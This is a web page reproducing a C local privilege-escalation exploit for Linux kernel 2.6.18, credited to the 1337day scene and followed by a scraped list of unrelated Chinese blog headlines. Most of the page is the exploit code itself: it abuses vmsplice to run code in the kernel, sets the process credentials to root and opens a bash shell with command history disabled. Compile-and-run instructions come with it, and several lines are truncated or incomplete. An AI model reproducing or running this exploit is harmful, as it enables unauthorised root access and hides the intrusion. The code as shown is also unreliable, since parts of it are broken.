LINUX 2.6.18-238 local root exp
/*
*
*
* 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
* 0 _ __ __ __ 1
* 1 /” \ __ /”__`\ /\ \__ /”__`\ 0
* 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
* 1 \/_/\ \ /” _ `\ \/\ \/_/_\_<_ /''___\ \ \/\ \ \ \ \/\`''__\ 0
* 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
* 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
* 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
* 1 \ \____/ >> Exploit database separated by exploit 0
* 0 \/___/ type (local, remote, DoS, etc.) 1
* 1 0
* 0 2.6.18 Modified By CrosS 1
* 1 0
* 0 Linux 2011 1
* 1 0
* -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
*
* Linux 2.6.18 Previously Coded by “Angel Injection” , couple of thanks for this, but
*
* it had errors while compiling, so this is modified version of this exploit
*
* working fine . Usage is given below..
*
* gcc -o exploit exploit.c
* chmod 777 exploit
* ./exploit
*
* Greetz: r0073r( 1337day.com ),r4dc0re,side^effects and all members of
1337day Team ) ….. & all members of r00tw0rm.com ( RW ) .. )
*
* Submit Your Exploit at Submit@1337day.com | mr.inj3ct0r@gmail.com
*
* For Educational purpose Only))
*/
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define __KERNEL__
#include
#define PIPE_BUFFERS 16
#define PG_compound 14
#define uint unsigned int
#define static_inline static inline __attribute__((always_inline))
#define STACK(x) (x + sizeof(x) – 40)
struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};
void exit_code();
char exit_stack[1024 * 1024];
void die(char *msg, int err)
{
printf(err ? “[-] %s: %s\n” : “[-] %s\n”, msg, strerror(err));
fflush(stdout);
fflush(stderr);
exit(1);
}
#if defined (__i386__)
#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif
#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246
static_inline
void exit_kernel()
{
__asm__ __volatile__ (
“movl %0, 0x10(%%esp) ;”
“movl %1, 0x0c(%%esp) ;”
“movl %2, 0x08(%%esp) ;”
“movl %3, 0x04(%%esp) ;”
“movl %4, 0x00(%%esp) ;”
“iret”
: : “i” (USER_SS), “r” (STACK(exit_stack)), “i” (USER_FL),
“i” (USER_CS), “r” (exit_code)
);
}
static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
“movl %%esp, %%eax ;”
“andl %1, %%eax ;”
“movl (%%eax), %0″
: “=r” (curr)
: “i” (~8191)
);
return (void *) curr;
}
#elif defined (__x86_64__)
#ifndef __NR_vmsplice
#define __NR_vmsplice 278
#endif
#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246
static_inline
void exit_kernel()
{
__asm__ __volatile__ (
“swapgs ;”
“movq %0, 0x20(%%rsp) ;”
“movq %1, 0x18(%%rsp) ;”
“movq %2, 0x10(%%rsp) ;”
“movq %3, 0x08(%%rsp) ;”
“movq %4, 0x00(%%rsp) ;”
“iretq”
: : “i” (USER_SS), “r” (STACK(exit_stack)), “i” (USER_FL),
“i” (USER_CS), “r” (exit_code)
);
}
static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
“movq %%gs:(0), %0″
: “=r” (curr)
);
return (void *) curr;
}
#else
#error “unsupported arch”
#endif
#if defined (_syscall4)
#define __NR__vmsplice __NR_vmsplice
_syscall4(
long, _vmsplice,
int, fd,
struct iovec *, iov,
unsigned long, nr_segs,
unsigned int, flags)
#else
#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif
static uint uid, gid;
void kernel_code()
{
int i;
uint *p = get_current();
for (i = 0; i < 1024-13; i++) {
if (p[0] == uid && p[1] == uid &&
p[2] == uid && p[3] == uid &&
p[4] == gid && p[5] == gid &&
p[6] == gid && p[7] == gid) {
p[0] = p[1] = p[2] = p[3] = 0;
p[4] = p[5] = p[6] = p[7] = 0;
p = (uint *) ((char *)(p + 8) + sizeof(void *));
p[0] = p[1] = p[2] = ~0;
break;
}
p++;
}
exit_kernel();
}
void exit_code()
{
if (getuid() != 0)
die("wtf", 0);
printf("[+] root\n");
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL);
die("/bin/bash", errno);
}
int main(int argc, char *argv[])
{
int pi[2];
size_t map_size;
char * map_addr;
struct iovec iov;
struct page * pages[5];
uid = getuid();
gid = getgid();
setresuid(uid, uid, uid);
setresgid(gid, gid, gid);
if (!uid || !gid)
die("!@#$", 0);
/*****/
pages[1] = pages[0] + 1;
map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[0]);
printf("[+] page: 0x%lx\n", pages[1]);
pages[0]->flags = 1 << PG_compound;
pages[0]->private = (unsigned long) pages[0];
pages[0]->count = 1;
pages[1]->lru.next = (long) kernel_code;
/*****/
pages[2] = *(void **) pages[0];
pages[3] = pages[2] + 1;
map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die(“mmap”, errno);
memset(map_addr, 0, map_size);
printf(“[+] mmap: 0x%lx .. 0x%lx\n”, map_addr, map_addr + map_size);
printf(“[+] page: 0x%lx\n”, pages[2]);
printf(“[+] page: 0x%lx\n”, pages[3]);
pages[2]->flags = 1 << PG_compound;
pages[2]->private = (unsigned long) pages[2];
pages[2]->count = 1;
pages[3]->lru.next = (long) kernel_code;
/*****/
map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die(“mmap”, errno);
memset(map_addr, 0, map_size);
printf(“[+] mmap: 0x%lx .. 0x%lx\n”, map_addr, map_addr + map_size);
printf(“[+] page: 0x%lx\n”, pages[4]);
/*****/
map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die(“mmap”, errno);
memset(map_addr, 0, map_size);
printf(“[+] mmap: 0x%lx .. 0x%lx\n”, map_addr, map_addr + map_size);
/*****/
if (pipe(pi) < 0) die("pipe", errno);
close(pi[0]);
iov.iov_base = map_addr;
iov.iov_len = ULONG_MAX;
signal(SIGPIPE, exit_code);
_vmsplice(pi[1], &iov, 1, 0);
die("vmsplice", errno);
return 0;
}
LINUX 2.6.18-238 local root exp的更多相关文章
- 监控Linux性能的18个命令行工具
监控 Linux 性能的 18 个命令行工具 对于系统和网络管理员来说每天监控和调试Linux系统的性能问题是一项繁重的工作.在IT领域作为一名Linux系统的管理员工作5年后,我逐渐 认识到监控和保 ...
- karottc A Simple linux-virus Analysis、Linux Kernel <= 2.6.37 - Local Privilege Escalation、CVE-2010-4258、CVE-2010-3849、CVE-2010-3850
catalog . 程序功能概述 . 感染文件 . 前置知识 . 获取ROOT权限: Linux Kernel <= - Local Privilege Escalation 1. 程序功能概述 ...
- Linux树莓派中/etc/rc.local不执行的问题
最近研究在树莓派中嵌入式开发java程序,并打算和Salesforce进行通信.需要开发一个java的web server,不想弄那么复杂,于是打算在linux系统中/etc/rc.local写想要执 ...
- 解决C3P0在Linux下Failed to get local InetAddress for VMID问题
解决C3P0在Linux下Failed to get local InetAddress for VMID问题 FailedtogetlocalInetAddressforVMID.Thisisunl ...
- Linux开机启动文件rc.local无法执行怎么办?
rc.local是Linux系统中的一个重要的开机启动文件,每次开机都要执行这个文件.但是有一些用户的Linux系统无法执行这个文件,并导致了一系列的问题.遇到这个问题我们应该怎么办呢? 在Linux ...
- Linux(Unix)密码策略问题导致root密码不能修改
Linux(Unix)密码策略问题导致root密码不能修改 发布时间: 2016-01-19 浏览次数: 1034 下载次数: 5 用户修改了密码配置文件,导致root账户修改密码时报如下错误: ...
- Linux下配置Nginx(在root的/etc/rc.local里配置开机启动功能http://tengine.taobao.org/)
上面是下载的包下载地址 http://tengine.taobao.org/download_cn.html nginx官网http://nginx.org/ 下一步 下一步 其中remote为重要属 ...
- [轉]Linux kernel <2.6.29 exit_notify() local root exploit分析(2009-1337)
author : deep_pro目前网上的这个exploit(http://www.milw0rm.com/exploits/8369)的分析是有些问题的(http://forum.evilocta ...
- Linux kernel perf_swevent_init Local root Exploit
64位上编译 另外修改了原Exploit的一个错误 第76行 把 uint64_t *p = (void *) ¤t[i]; 改成 uint64_t *p = (void *) & ...
随机推荐
- 2.11 2D平面最近点对问题[closest pair problem]
[本文链接] http://www.cnblogs.com/hellogiser/p/closest-pair-problem.html [题目] 给定平面上N个点的坐标,找出距离最近的两个点之间的距 ...
- 如何给spine骨骼动画挂载粒子特效
目的是要把粒子挂载到骨骼动画的某个一个部件上,其实最主要是找对位置. 预览效果,左手红火,右手蓝火,很炫吧:) //init bool HelloWorld::init() { /////////// ...
- WordPress前台后台页面打开慢的解决方法
写个人网站用WordPress程序是一个不错的选择,但是目前安装之后速度很慢,后台配置页面半天打不开,在网上查了一下原来是Google被墙导致,WordPress默认模板会加载谷歌的open-sans ...
- (原创)Python字符串系列(1)——str对象
在本博客 <Python字符串系列> 中,将介绍以下内容: Python内置的str对象及操作 字符串的格式化 Python中的正则表达式 re模块 本文将介绍Python内置的 str ...
- August 6th, 2016, Week 32nd, Saturday
It is not the mountain we conquer, but ourselvess. 我们征服的不是高山,而是我们自己. Difficulties and obstacles, jus ...
- oracle 10g 学习之多表查询、分组函数(6)
笛卡尔集 l 笛卡尔集会在下面条件下产生: 省略连接条件 连接条件无效 所有表中的所有行互相连接 l 为了避免笛卡尔集, 可以在 WHERE 加入有效的连接条件. 自连接 select m.las ...
- Mongodb安装(Mac平台)
1安装: sudo brew install mongodb 2 启动MongoDb sudo mongod —config /usr/local/etc/mongod.conf 3.登录mongo ...
- LBS优化方案探究
方案1: 假设数据结构是这个样子的结构 那么找某个范围之内的用户,相当于: select * from tb_lbs_user where lat > lat_min and lat < ...
- H.264 基础及 RTP 封包详解
转自:http://my.oschina.net/u/1431835/blog/393315 一. h264基础概念 1.NAL.Slice与frame意思及相互关系 1 frame的数据可以分为多个 ...
- 兼容古董级IE小结
IE6已经死亡,当然7,8,9,10也挂掉了.微软对IE11更下了狠手,对其停止了更新.以为前端就可以安安心心地写代码了.可是就是有些顽固分子,竟然用的还是IE6,尊崇客户至上的原则,就恶心着给他兼容 ...